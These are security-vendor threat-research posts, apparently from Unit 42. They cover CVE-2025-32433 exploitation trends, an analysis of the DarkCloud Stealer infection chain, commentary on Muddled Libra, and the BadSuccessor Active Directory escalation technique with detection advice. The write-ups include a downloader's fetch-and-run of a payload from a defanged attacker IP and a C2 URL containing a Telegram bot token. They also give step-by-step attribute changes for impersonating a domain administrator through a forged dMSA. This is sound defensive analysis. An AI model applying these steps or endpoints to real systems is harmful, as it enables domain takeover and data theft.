Mining and aerospace
Defense

We should instead see it as potential evidence of detection weakness or delayed targeting.

These findings highlight that attackers are exploiting the realities of IT/OT convergence and are targeting operational systems wherever they exist.

Temporal Trends in Exploitation

Bar chart showing daily data from May 1st to May 9th 2025 with two categories: "Total" and "OT Only." The bars for "Total" are consistently higher than those for "OT Only." Color distinctions indicate different categories with blue for Total and red for OT Only. — Figure 7. Trigger distribution by day.

Analyzing the data we have for May 2025, peaks in total triggers often correlate with OT activity. Figure 7 shows the days with the highest total triggers (May 3, May 6, May 8, May 9) include the days with significant OT activity (May 3, May 8, May 9).

Exploitation attempts of CVE-2025-32433 are not uniform or continuous — they appear in concentrated bursts that disproportionately impact OT environments. When activity spikes, it is frequently driven by OT-specific triggers, often accounting for over 80% of detections on peak days.

The geographic, industrial and temporal footprint of CVE-2025-32433 exploit attempts highlights a strategic shift in attacker behavior toward operational environments across diverse sectors and regions. Exploits are not limited to traditionally defined industrial control systems. They appear in healthcare, education, high tech and other verticals — many of which host embedded OT systems not previously treated as high risk.

Geographically, countries with mature digital infrastructure and strong industrial bases — such as Japan, the U.S. and Brazil — show high OT exposure, while sectors like utilities and mining show no detections despite high inherent risk. This suggests telemetry gaps, delayed targeting or underreporting. Combined, these patterns illustrate that modern OT threats do not follow legacy assumptions about where OT resides or how it is attacked.

We have confirmed active exploitation attempts through payload telemetry, with disproportionate impact on OT networks across multiple industries. The use of stealthy reverse shells and DNS-based callbacks further indicates that attackers are employing evasive techniques.

Mitigation Guidance

The rapid surge in attack payloads suggests that threat actors have quickly adopted this exploit in active campaigns. This pattern underscores the urgency for organizations — particularly those in the targeted sectors and geographies outlined above — to improve protections.

Apply the latest security patches
Update intrusion prevention systems with the newest signatures
Closely monitor environments for signs of compromise

The primary mitigation for this vulnerability is to upgrade Erlang/OTP to a patched version:

OTP 27.3.3 or later
OTP 26.2.5.11 or later
OTP 25.3.2.20 or later

As a temporary workaround (if patching is not immediately possible), consider disabling the SSH server or using firewall rules to restrict access to trusted sources only (as suggested by NIST).

Conclusion

CVE-2025-32433 is a serious vulnerability resulting from improper state enforcement in the Erlang/OTP SSH daemon, which could potentially allow unauthenticated RCE. The failure to reject post-authentication messages before authentication completion creates a significant attack surface that is being exploited in the wild.

Attackers are attempting to exploit the vulnerability in short, high-intensity bursts. These are disproportionately targeting OT networks and attempting to access exposed services over both IT and industrial ports. Early telemetry confirms that the threat extends far beyond traditional industrial sectors, impacting education, healthcare and high technology — underscoring the reality that critical OT assets now exist across a much broader digital surface area.

Organizations must re-examine their exposure, enhance OT-specific visibility and treat CVE-2025-32433 not as an isolated issue, but as a case study in how general-purpose software flaws can rapidly escalate into operational threats.

Palo Alto Networks Product Protections for CVE-2025-32433

Palo Alto Networks customers are better protected from these threats by the products and services listed below.

Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection.

Cortex Xpanse has the ability to identify exposed devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.

Next-Generation Firewall with the Advanced Threat Prevention subscription can help block activity associated with CVE-2025-32433 (Erlang OTP SSH Remote Code Execution Vulnerability) with the release of our threat prevention signature 96163.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
UK: +44.20.3743.3660
Europe and Middle East: +31.20.299.3130
Asia: +65.6983.8730
Japan: +81.50.1790.0200
Australia: +61.2.4062.7950
India: 00080005045107

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

.dns.outbound.watchtowr[.]com
194.165.16[.]71
146.103.40[.]203

Additional References

New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

Posted on August 7, 2025August 6, 2025 by Samantha Stallings

Executive Summary

Unit 42 researchers recently observed a shift in the delivery method in the distribution of DarkCloud Stealer and the obfuscation techniques used to complicate analysis. First seen in early April 2025, these new methods and techniques include an additional infection chain for DarkCloud Stealer. This chain involves obfuscation by ConfuserEx and a final payload written in Visual Basic 6 (VB6).

We previously identified a series of attacks linked to the distribution of DarkCloud Stealer. It also leveraged AutoIt to bypass detection systems. We documented these details in DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt.

Palo Alto Networks customers are better protected through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics	Infostealers, Anti-analysis

Delivery Mechanism and Updated Infection Chain

We have observed three slightly different attack chains delivering the same final DarkCloud Stealer payload in recent attacks.

Each attack chain starts with a phishing email that contains either a tarball (TAR), Roshal (RAR) or a 7-Zip (7Z) archive. Both the TAR or RAR versions contain a JavaScript (JS) file, while the 7Z version contains a Windows Script File (WSF). The threat actor is at a point in development that, for all infection chain paths, almost every stage is obfuscated or protected.

Figure 1 shows an overview of the different infection chains of these recent DarkCloud Stealer campaigns.

Flowchart showing a cybersecurity attack sequence starting from a phishing email with various file types (RAR, JS, TAR), leading to an Open Directory Server, engaging a PowerShell script (PS1), and culminating in the execution of a malware payload process. The process begins with an EXE file, labeled as the initial payload ConfuserEx, which launches the official .Net RegAsm tool, and results in a second injected EXE known as the final payload VB6. — Figure 1. Infection chain of recent DarkCloud attacks.

In the chains initiated by a JS script, executing the script downloads and executes a PowerShell (PS1) file from an open directory server. The PS1 file then drops an executable (EXE) file that is the ConfuserEx-protected version of the final DarkCloud payload. Looking at the JS file here in Figure 2, the script is obfuscated by the tool javascript-obfuscator.

A screenshot of a computer monitor displaying multiple lines of colorful computer code on a black background. — Figure 2. JS downloader in its original obfuscated form.

Figure 3 below shows the deobfuscated version of the same script. In summary, the script:

Uses ActiveXObject('MSXML2.XMLHTTP') object to obtain the next stage PS1 script at hxxp[:]//176.65.142[.]190/BLACKYY/newbag.ps1
Uses ActiveXObject('Scripting.FileSystemObject') object to drop the PS1 file as a random 8-character lowercase name in the C:\Temp folder.
Uses ActiveXObject('WScript.Shell') object to run a PowerShell command to execute the PS1 file.

A screenshot displaying many lines of code that involve JavaScript functions related to network activities and error handling, written in a text editor with syntax highlighting. — Figure 3. Unobfuscated JS downloader.

Figure 4 illustrates an open directory server hosting many malicious PS1 files. In this case, the kay.ps1 is the next stage PS1 sample that the JS script downloaded and executed.

Screenshot of a web directory listing. It is the index for blackyy. It is on Apache/2.4.58 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Server at 176 dot 65 dot 142 dot 190 Port 80, displaying various files with details on the last modified dates and file sizes. — Figure 4. Open directory server hosting PS1 files.

The infection chain initiated by a 7Z archive drops a WSF file. The WSF file mainly consists of a single <job> tag, which contains a <script language="JScript"> tag. The JScript code is again heavily obfuscated, but in a different way than the JS file shown in Figure 2. It also uses ActiveXObject objects to download and execute a PS1 file from the same open directory server. However, the PS1 script associated with this WSF downloader is different.

Next, we will focus on the JS-based infection chain that runs the kay.ps1 PowerShell script. This PS1 also has two layers of encryption scheme. Figure 5 shows partial code snippets from the first layer. The snippet uses Invoke-Expression (a PowerShell command that executes a string as if it were a command) to invoke another PowerShell expression that is both Base64-encoded and AES-encrypted.

Screenshot of computer code involving Base64 encoding and decryption processes. The PowerShell script first layer. — Figure 5. First layer of the PS1 script.

Figure 6 shows a code snippet from the invoked PS1 expression, revealing its core functionality. The code reveals that an EXE file is written to the %tmp% folder with a randomly generated 8-character upper- or lower-case filename. The script then executes the dropped EXE file using the Start-Process command.

Figure 6. Second layer of the PS1 script.

DarkCloud Technical Analysis: Expanded View

In the following section, we delve deeper into the analysis of the 32-bit .NET malware sample. This malware sample contains the final DarkCloud executable written in VB6 and wrapped in a layer of ConfuserEx obfuscation.

Stage One: Initial ConfuserEx Obfuscation

ConfuserEx 2 is an open-source protector for .NET applications. Files protected with ConfuserEx are watermarked with a ConfusedByAttribute attribute. ConfuserEx comes with many features and protections such as:

Anti-tampering (method encryption): This protects the application from unauthorized modification. This is accomplished by only decrypting the code of method bodies at runtime. This decryption is performed in the module constructor (<Module>.cctor), which executes before reaching the main entry point.
Symbol renaming: This changes class, method and variable names to random, meaningless, non-American Standard Code for Information Interchange (ASCII) printable identifiers.
Control flow obfuscation: This alters the code structure with opaque predicates (cf. control flow flattening).
Method reference hiding: This is also known as proxy call method obfuscation (this will be later described in more detail).
Constant encoding: This encodes constants (e.g., strings using fixed reversible transformations.

The malware author applied these protections to the analyzed malware sample.

First, we can adapt the AntiTamperKiller code to defeat anti-tampering protection. This transformed the sample's .NET code, as Figure 7 shows.

Screenshot of a computer screen displaying code in an IDE with error messages, specifically a DecompilerException, indicating non-generic decompiling issues. The code includes hex addresses and assembly language elements. — Figure 7. The original sample depicting anti-tampering protection applied.

The method body code consists of bogus invalid .NET instructions into the deobfuscated code seen in Figure 8, where the real method body code is now visible. In particular, we extracted the specific parameters of the anti-tampering protection:

Key 1: 0xc225d58c
Key 2: 0xa2e32024
Key 3: 0xdcc95ec9
Key 4: 0x00000000
Name hash: 0xe0cbeae4
Internal key: 0x3dbb2819

A screenshot of a computer screen displaying code in a software development environment. The code includes loops and conditional statements. — Figure 8. Sample with anti-tampering protection removed.

Next, we still have more cleanup work to do on the partially deobfuscated sample. We then applied de4dot-cex (a fork of de4dot, a generic .NET deobfuscator and unpacker, which includes support for ConfuserEx deobfuscation) to the sample, using the -p crx command-line switch. This transforms the .NET sample’s code seen in Figure 8 into the code shown in Figure 9, by renaming the obfuscated symbols and reverting the control flow flattening.

Image of a snippet of computer code showing functions and variable assignments within a Main method. — Figure 9. Partially deobfuscated sample, after applying de4dot-cex.

Thereafter, proxy call methods can be fixed using the proxy call remover tool. Proxy call method obfuscation is a technique that replaces direct method calls with calls to intermediate (i.e., proxy) methods. These proxy methods often do almost nothing besides forwarding the original call. However, they make control flow more difficult for the analyst to follow, thus hindering the code decompilation process. This reduces code readability and increases the effort required to fully understand the entire program logic.

Removing these proxy call methods resulted in the simplified code seen in Figure 10. The Class8.smethod_10 method is revealed as the standard Convert.FromBase64String method.

A screenshot of programming code displayed on a digital screen, featuring functions and methods related to data conversion and string manipulation. — Figure 10. Deobfuscated sample with proxy calls removed.

Eventually, the final DarkCloud VB6 payload (which is in Triple Data Encryption Standard (3DES) encrypted form shown in Figure 11) is decrypted and executed.

Screenshot of a computer code in a development environment, featuring several lines that include methods for converting Base64 strings. — Figure 11. Final VB6 payload in 3DES-encrypted form.

The Base64-encoded key, initialization vector (IV) and ciphertext are stored as strings within the <Module>.byte_0 variable in Length-Value format, as shown in Figure 12.

Hexadecimal values displayed in pink and green on a black background, with some ASCII characters visible on the right side. — Figure 12. <Module>.byte_0 variable in Length-Value format.

The standard Type-Length-Value (TLV) format (TLV) format typically includes a type identifier, but in this case, it’s omitted because all values are strings. For instance, the cryptographic key iA9B1uKFddQdqiLSSuzvD2GhL1o2Jv+v (also shown in Figure 11) is stored as a 32-byte string. The length is specified at offset 60 in little-endian format, with the string value beginning at offset 64.

The <Module>.byte_0 variable value is initialized in the module constructor (<Module>.cctor), through a series of exclusive OR (XOR) and bitwise (arithmetic bit shift) operations on a hard-coded 100,560-element unsigned integer array. After initialization, other generic .NET methods, each accepting a single integer id as parameter, use this array to index the initialized <Module>.byte_0 variable and return a string. Figure 13 shows one such method, <Module>.smethod_6.

A screenshot of many lines of code showing with several lines including conditionals, loops, and function definitions. — Figure 13. Example generic .NET method providing a string lookup by id on the <Module>.byte_0 variable.

Stage Two: Final VB6 Payload

RunPE, or process hollowing, is a process injection technique. Process hollowing works by first creating a fresh instance of a (usually legitimate) process in a suspended state. The process memory is then overwritten with code from another (usually malicious) executable. Subsequently, the process thread resumes at the entry point of the overwritten code, so that the malicious code now runs in the context of the benign process.

The ConfuserEx protected process uses process hollowing to inject the final VB6 payload. After decryption, the final VB6 payload named holographies.exe, is injected into a new native Portable Executable (PE) process spawned by the initial ConfuserEx process. The process used for injection is RegAsm.exe, a legitimate utility that comes with the default installed .NET Framework SDK on Windows.

The presence of the string DarkCloud within the final VB6 payload (shown in Figure 14) confirms its affiliation with the DarkCloud malware family.

Hexadecimal and ASCII data representations on a computer screen, including highlighted sections spelling out DARK CLOUD. — Figure 14. DARKCLOUD Unicode string in little-endian format (UTF16-LE) embedded within the final VB6 payload file.

Additionally, critical strings within the payload are encrypted using the Rivest Cipher 4 (RC4) stream cipher algorithm, with each ciphertext typically using a unique key. For instance, the ciphertext 58364B6DB1C7D797DFA59186B4 paired with the key sMgSInEGpSAgkfcMSUPDDFCVSTyhowuHorsctkyTMYZh decrypts to the string WScript.Shell. These sensitive strings can be broadly categorized as:

Regular expressions
Credit card names
Registry paths
Directory and file paths (including file extensions)
Telegram API credentials (used for C2 purposes)
Other miscellaneous strings

Conclusion

DarkCloud Stealer is typical of an evolution in cyberthreats, leveraging obfuscation techniques and intricate payload structures to evade traditional detection mechanisms. The developers of the malware complicated its analysis by adopting ConfuserEx and a VB6 payload in its infection chain.

The shift in delivery methods observed in April 2025 indicates an evolving evasion strategy. This highlights the need for security professionals to adopt proactive, behavior-based approaches to threat detection and mitigation.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research.
Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
Cortex Cloud customers are better protected from DarkCloud Stealer through the proper placement of Cortex Cloud XDR endpoint agent and serverless agents within a cloud environment. Designed to protect a cloud’s posture and runtime operations against these threats, Cortex Cloud helps detect and prevent the malicious operations or configuration alterations or exploitations discussed within this article.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
UK: +44.20.3743.3660
Europe and Middle East: +31.20.299.3130
Asia: +65.6983.8730
Japan: +81.50.1790.0200
Australia: +61.2.4062.7950
India: 00080005045107

Indicators of Compromise

File Type	SHA256 Hash
RAR archive	bd8c0b0503741c17d75ce560a10eeeaa0cdd21dff323d9f1644c62b7b8eb43d9
TAR archive	9588c9a754574246d179c9fb05fea9dc5762c855a3a2a4823b402217f82a71c1
JS file	6b8a4c3d4a4a0a3aea50037744c5fec26a38d3fb6a596d006457f1c51bbc75c7
PS1 file	F6d9198bd707c49454b83687af926ccb8d13c7e43514f59eac1507467e8fb140
WSF file	72d3de12a0aa8ce87a64a70807f0769c332816f27dcf8286b91e6819e2197aa8
7Z archive	fa598e761201582d41a73d174eb5edad10f709238d99e0bf698da1601c71d1ca
7Z archive	2bd43f839d5f77f22f619395461c1eeaee9234009b475231212b88bd510d00b7
Initial ConfuserEx .NET EXE file	24552408d849799b2cac983d499b1f32c88c10f88319339d0eec00fb01bb19b4
Final DarkCloud VB6 EXE file	ce3a3e46ca65d779d687c7e58fb4a2eb784e5b1b4cebe33dbb2bf37cccb6f194

Malware distribution URL hxxp[:]//176.65.142[.]190
C2 URL hxxps[:]//api.telegram[.]org/bot7684022823:AAFw0jHSu-b4qs6N7yC88nUOR8ovPrCdIrs/sendMessage?chat_id=6542615755

Additional Resources

DarkCloud Stealer: Comprehensive Analysis of a New Attack Chain That Employs AutoIt – Unit 42, Palo Alto Networks
.NET Hooking - Harmonizing Managed Territory – Jiří Vinopal, Check Point Research

Muddled Libra: Why Are We So Obsessed With You?

Posted on August 6, 2025November 21, 2025 by Ria Bhatia

Why Do We Talk So Much About Muddled Libra?

Many articles and presentations have covered the tactics, techniques and procedures of the group that Unit 42 tracks as Muddled Libra. Known for social engineering tactics, the group recently attacked organizations in industries including government, retail, insurance and aviation. There's an undeniable impact for the group’s victims, but I’ve also been pondering why this group seems to receive more media attention than other groups that also partner with Ransomware-as-a-Service (RaaS) programs.

There are other affiliates that heavily target English-speaking countries, and that are just as fast and impactful. Reading Trend 3 of our recent 2025 Unit 42 Global Incident Response Report, for example, there are fast attacks in incident response cases related to a variety of threat groups.

Here are some thoughts on why Muddled Libra has been a particular focus for the media:

Distinct Playbook, Industry Targeting

Even though Muddled Libra often uses publicly available tools and known techniques, their playbook is pretty consistent and their vishing is somewhat unique. This may make it easier to identify this group of hackers across cases versus other hacking teams. Muddled Libra has also attacked companies in waves by industry, which puts companies in those industries on high alert. It’s one thing to know that your organization may be attacked at any time, it’s another to know a specific threat actor is successfully targeting your peers and you may be getting attacked right now and not even know it. For other intrusions involving a RaaS affiliate, many of these groups have such similar techniques that it makes it difficult to differentiate them, and their targeting more opportunistic across industries, so there is not as coherent a story to tell.

Successful Tactics

Just looking at our cases in 2025 involving this threat actor this year, 50% of cases led to DragonForce ransomware deployment and data exfiltration, showing that Muddled Libra’s attacks are frequently successful. Granted, we don't know how many calls to Help Desks go nowhere for this group, so it may be harder to measure them against their "peers." But the urgency of requests from organizations express palpable fear of Muddled Libra, as if executives were really worried they simply could not stop this threat actor.

The Power of Language

The really differentiating factor for me for this group is the English-speaking fluency that they are able to employ. It’s not really possible to screen malicious calls and protect your help desk from ever receiving them. This may allow Muddled Libra to more surgically pick and choose which targets to go after within a victim environment. Seeing the success of this language fluency and these social engineering tactics makes me wonder what will happen as AI capabilities continue to mature. Could we see every RaaS affiliate gain the capability to act like Muddled Libra?

Studying the Group Is Key to Defending Against It

As described in our Muddled Libra Threat Assessment, we’ve seen organizations disrupt Muddled Libra through properly implementing Conditional Access Policies. There are many other recommendations that can make a difference to stopping or slowing this threat actor. For example, gathering information that can point to suspicious activities and intelligently making connections with it (with capabilities such as those of Cortex XSIAM) can help identify incidents that need a response.

Focused study of Muddled Libra and sharing information around it helps us all stay aware of the sorts of defenses that could make a difference, against this threat actor and many others. Knowing what’s worked for organizations who have successfully stopped the group can show all organizations that there is hope for defense, even against persistent and successful threat actors.

When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory

Posted on August 6, 2025August 5, 2025 by Samantha Stallings

Executive Summary

BadSuccessor is a critical attack vector that emerged following the release of Windows Server 2025. Under certain conditions, this server version enables users to leverage delegated Managed Service Accounts (dMSAs) to elevate privileges within Active Directory environments running Windows Server 2025. At the time of writing this article, no patch exists for this issue.

By analyzing the core mechanics of this technique and offering practical detection strategies, we help security professionals and system administrators understand dMSAs and how attackers can misuse them to elevate privileges. We also provide advice on how to implement effective detection and mitigation strategies.

Palo Alto Networks customers are better protected against the BadSuccessor technique through Cortex XDR and XSIAM. These products already have the ability to detect the attack. Performing auditing on the delegated Managed Service Account is a required action that we describe in this article.

The Unit 42 Managed Detection and Response Service can assist with threat detection, investigation and response/remediation.

The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Related Unit 42 Topics	Microsoft, Active Directory

BadSuccessor Overview

BadSuccessor is a novel technique that enables a threat actor with sufficient privileges to compromise an Active Directory (AD) domain by misusing controlled delegated Managed Service Account (dMSA) objects.

Originally detailed in research published by Akamai, this technique demonstrates how modifying a small set of attributes on a dMSA object under the attacker’s control can lead to privilege escalation within the environment. Publicly available tools have already been released to automate various steps involved in leveraging this technique, potentially lowering the barrier for its adoption.

We provide a comprehensive breakdown of the attack methodology, along with guidance on detection strategies and potential mitigations.

Understanding dMSAs

The Evolution of MSAs

Windows has two basic types of accounts:

Machine accounts
User accounts

In an AD environment, machine accounts represent hosts (servers or clients) that belong to a domain, while user accounts represent the users who log into and access the environment.

Service accounts are user accounts or machine accounts that provide a security context for services running on a Windows Server. In other words, Windows services authenticate with service accounts. Windows relies on service accounts to run its various features.

With the release of Windows Server 2008 R2, Microsoft introduced Managed Service Accounts (MSAs) and group Managed Service Accounts (gMSAs) to simplify and enhance AD service account management.

MSAs and gMSAs are specialized service accounts designed to securely run services within an AD environment without the need for manual password handling. An MSA account is linked to a single computer, allowing only that machine to retrieve and use the account. Conversely, a gMSA account can be used by multiple computers, like clusters or server farms.

A key benefit of MSAs and gMSAs is that AD automatically manages their passwords. This involves generating strong, unique passwords and rotating them regularly, eliminating the need for human administrators to manage credentials. For example, when a service needs to access a domain resource, the Local Security Authority Subsystem Service (LSASS) uses the machine account to securely request the MSA or gMSA’s password. In this way, the password is handled in the AD and not directly by a user or an administrator.

Delegated Managed Service Accounts

The dMSA is a new account type introduced in Windows Server 2025 to facilitate the migration of traditional service accounts to Managed Service Accounts. This process is as follows:

An administrator creates a new dMSA object, which is intended to supersede the existing service account.
The administrator then initiates the migration, which sets the dMSA msDS-ManagedAccountPrecededByLink attribute to reference the original service account.
When the original service authenticates as the original service account, it triggers a Lightweight Directory Access Protocol (LDAP) modify request. This adds the machine account to the list of principals that are allowed to retrieve the dMSA password.
In the final step, the administrator completes the migration, which disables the original service account. The service continues to operate seamlessly using the dMSA.
Once a dMSA supersedes an existing account, any attempts to authenticate as that existing account using its password will be blocked. These authentication requests are redirected to the Local Security Authority (LSA) to authenticate using the dMSA. By then, the request has been granted all permissions that the original account had in the Active Directory, by the Key Distribution Center (KDC).

While dMSAs are intended to prevent credential harvesting, dMSAs also create a privilege escalation path that attackers can exploit through the BadSuccessor technique.

dMSA Migration Flow

The migration process of a traditional service account to a dMSA is triggered by an administrator using the Start-ADServiceAccountMigration PowerShell AD module command. The administrator passes the following values to the command:

The Distinguished Name (DN) of the intended dMSA account
The DN of the superseded account

As the migration continues, it changes several attributes of the normal service account as it transitions to a dSMA account, including:

The msDS-DelegatedMSAState attribute is set to 1 in the newly created dMSA.

This attribute indicates the current state of the dMSA. Microsoft's documentation shows that 1 means the account migration has begun.

The dMSA’s msDS-ManagedAccountPrecededByLink attribute is set to reference the superseded account.

Next, the administrator initiates the Complete-ADServiceAccountMigration command. This command disables the superseded account, and it changes the msDS-DelegatedMSAState and msDS-SupersededServiceAccountState attribute values of the dMSA object to 2, indicating that the migration is complete.

Following this migration, any service that relies on the superseded account will use the dMSA instead, which now has all the permissions that the superseded account had.

Technical Analysis: Bad Successor Technique and Tools

This section demonstrates how attackers can use dMSAs to impersonate any domain user account, including the domain administrator, using the BadSuccessor technique.

dMSA Misuse

If an attacker or low-privileged user attempts to initiate the migration process for an existing service account, the operation will fail, because only administrative users can initiate migration. Instead of initiating the migration process, a potential attacker would create a dMSA and then change the same dMSA attributes that the valid migration process changes. This mimics a migration and has the same effect on the migrated account.

By default, only high-privileged users can create dMSAs under the default Managed Service Accounts container. However, other users can create dMSAs in other containers. This ultimately means that any domain user who has Create all child objects or msDS-DelegatedManagedServiceAccount permissions on an organizational unit (OU) could potentially compromise the entire domain.

The following steps detail how an attacker could simulate the migration:

Set the msDS-ManagedAccountPrecededByLink attribute to contain the DN of the account the attacker wants to impersonate.
Set msDS-DelegatedMSAState to 2, to indicate that the migration process is complete.

After changing these attributes and authenticating as the dMSA, the attacker obtains the full permissions of the superseded account.

Any user with sufficient permissions can execute this method in any AD environment managed by a Windows Server 2025 domain controller (DC).

BadSuccessor Simulation

Before performing the actual attack, an attacker must ensure the compromised user has sufficient permissions to create all child objects or dMSAs. Akamai released a PowerShell script named Get-BadSuccessorOUPermissions.ps1 that finds domain accounts that have the appropriate permissions on an OU to perform the BadSuccessor technique.

Figure 1 shows an example of Akamai's tool in action in a test AD environment. The output provides details of the objects in the domain that can be leveraged for BadSuccessor.

Screen showing Windows PowerShell with a command executed to get AD user permissions, displaying results for a specific user from a domain. — Figure 1. Executing Get-BadSuccessorOUPermissions.ps1 in our test environment.

In the example from Figure 1, the results indicate that an account named test_weak has the correct permissions to create a dMSA object under the OU DelegatedOU.

The enumeration tool performs the command shown in Figure 2 to retrieve OU DNs and their security descriptors.

Figure 2. Command to retrieve OU DNs and their security descriptors.

After the tool retrieves the OU DNs and their security descriptors, it reviews the output to find the following rights:

Create Child: msDS-DelegatedManagedServiceAccount
Create Child: All Objects

The tool’s output reveals all users and OU pairs that can potentially be leveraged for the BadSuccessor technique.

Using a newly found account with the required permissions, an adversary can potentially perform the BadSuccessor technique using PowerShell's Active Directory Module and LDAP, as described in the Akamai article.

First, the attacker creates a dMSA under the found OU. We demonstrate this in Figure 3 by creating a dMSA object named attacker_dMSA.

Image depicts a computer code snippet on a dark background with text including PowerShell commands related to creating a new service account named "attacker_0WSA" and managing DNS and computer settings. — Figure 3. Commands to create a dMSA object under the found OU.

Next, the attacker changes the attributes of the dMSA object to simulate the migration process. We demonstrated this in our test environment by setting the following values:
- msDS-ManagedAccountPrecededByLink attribute to contain the DN of the superseded account
- msDS-DelegatedMSAState to 2, to indicate that the migration process is complete

Screenshot of computer code related to a dMSA object. — Figure 4. Attributes of a dMSA object changed for the BadSuccessor technique.

Now that we know how the BadSuccessor technique works, let’s explore how different tools can automate an attack.

SharpSuccessor

SharpSuccessor is a proof of concept (PoC) hosted on a GitHub repository that automates the BadSuccessor technique. Figure 5 simulates an attack using a user account named test_weak in our test environment. This account has permissions to create a dMSA object under the DelegatedOU.

Figure 6 shows that the attacker_dMSA account is subsequently created in the OU.

Screenshot of the Active Directory Users and Computers management tool, displaying a list of folders including 'Users', 'Computers', and 'Domain Controllers.' — Figure 6. attacker_dMSA created under DelegatedOU.

Figure 7 shows how test_weak changed the msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState attributes of attacker_dMSA. This simulates the completion of the migration.

Screenshot of a software dialog box titled "attacker_dMSA Properties" displaying various system attributes and their corresponding values, primarily focused on security and user account settings. Two settings are highlighted. — Figure 7. attacker_dMSA attributes msDS-DelegatedMSAState and msDS-ManagedAccountPrecededByLink.

Pentest-Tools-Collection BadSuccessor Module

The Pentest-Tools-Collection recently added a BadSuccessor module as one of its AD tools. This module has two modes:

Check mode
Exploit mode

Like the enumeration tool we previously discussed, this module’s check mode enumerates an AD environment. This enumeration indicates whether the environment can be exploited using the BadSuccessor technique and what OU can be used for a successful attack.

Figure 8 shows the results of this module after we ran it in check mode in our test environment.

Screenshot of PowerShell windows with queries being executed related to domain controls and system checks. — Figure 8. Executing Pentest-Tools-Collection's BadSuccessor module in check mode.

This module’s exploit mode creates a dMSA object and sets its attributes to falsely indicate that a migration process is complete. Figure 9 shows the use of this module in exploit mode automating the same BadSuccessor process previously shown in Figures 3 and 4.

Command line interface showing the configuration of a user named 'test_weak' being granted impersonation rights on an 'Administrator' account within a domain environment. — Figure 9. Executing Pentest-Tools-Collection's BadSuccessor module in exploit mode.

Domain Compromise

After successfully executing the BadSuccessor technique, potential attackers can further exploit the domain using Rubeus, which supports dMSA authentication. Figure 10 illustrates some Rubeus commands using the attacker_dMSA object in our test environment to gain access to privileged services in the domain.

Screenshot of a computer terminal displaying commands related to Rubues.exe on a Windows system, specifically for requesting and applying Kerberos tickets, involving entities such as a user named 'attacker', and domains ending in 'env20.local'. — Figure 10. Example of commands to use Rubeus to further exploit the domain in our test environment.

Figure 11 shows that after executing these Rubeus commands, test_weak can now access the network share C$ drive on the DC, which requires Domain Admin privileges.

Screenshot of a Windows command prompt display showing directory listings with dates and times for folders such as Program Files, Program Files (x86), and Users. — Figure 11. test_weak account accessing the DC’s C$ directory using the attacker_dMSA object in our test environment.

Detecting BadSuccessor Activity

As presented in the Akamai article, the operations involved in BadSuccessor can be monitored via the following event IDs:

Event ID 5137 — Tracks the creation of dMSA objects
Event ID 5136 — Tracks the modification of the msDS-ManagedAccountPrecededByLink attribute
Event ID 2946 — Tracks the Ticket Granting Ticket (TGT) that is generated for a dMSA

But we propose an alternative way to track BadSuccessor activity and the footprints that it leaves behind; by leveraging Event ID 4662.

When a user creates a dMSA object, the initiating user or process requires and uses the CreateChild access rights on the OU. Figure 12 shows how dMSA object creation using the CreateChild access rights is reflected in Event ID 4662 (An operation was performed on an object).

Event Properties window showing details of event 4662, Microsoft Windows security auditing. Fields include Account Name, Security ID, Object Type, Handle ID, Operation Type, and other specific identifiers, highlighted with a red box around the Additional Information. — Figure 12. Event ID 4662 that audits the dMSA creation.

The same Event ID is generated when a user with sufficient access rights modifies the following two attributes in the properties of the dMSA object.

2f5c138a-bd38-4016-88b4-0ec87cbb4919 represents msDS-DelegatedMSAState
a0945b2b-57a2-43bd-b327-4d112a4e8bd1 represents msDS-ManagedAccountPrecededByLink

Changing the above dMSA attributes triggers the event shown in Figure 13.

Legitimate dMSA Migration Process Footprints

To better detect BadSuccessor, we must also know the differences between the footprints of malicious dMSA activity and legitimate dMSA migration. Only Administrative users can legitimately migrate service accounts to dMSA objects. To detect BadSuccessor activity, we must search for unprivileged users who have created a dMSA and then accessed the object’s specific attributes with the Access Mask value of 0x20 as shown in Figure 13.

A slightly different footprint is created when a privileged user creates a dMSA legitimately and then migrates a service account. According to Microsoft's guide, only a privileged user can create a dMSA under the OU Managed Service Account. The Event 4662 log entry in Figure 14 shows an Administrator user creating a child object (the dMSA) in the Managed Service Account OU.

Event Properties window showing details of event 4662, Microsoft Windows security auditing. — Figure 14. Event ID 4662 that documents the creation of a legitimate dMSA.

A legitimate migration uses an initial msDS-DelegatedMSAState attribute with a value of 1. Figure 15 shows that the msDS-DelegatedMSAState attribute was changed in the first step of the migration process, while Figure 16 shows it was changed to 1.

Event Properties window showing details of event 4662, Microsoft Windows security auditing. A red box highlights the last item in the Properties list. — Figure 15. Event ID 4662 that audits the first step of dMSA account migration, where the msDS-DelegatedMSAState attribute is changed.

Screenshot of Microsoft Windows security auditing event detail, focusing on the LDAP Display Name 'msDs-DelegatedServiceAccount' with its value set to 1. — Figure 16. Event ID 5136 that audits the change of the msDS-DelegatedMSAState dMSA object attribute to 1.

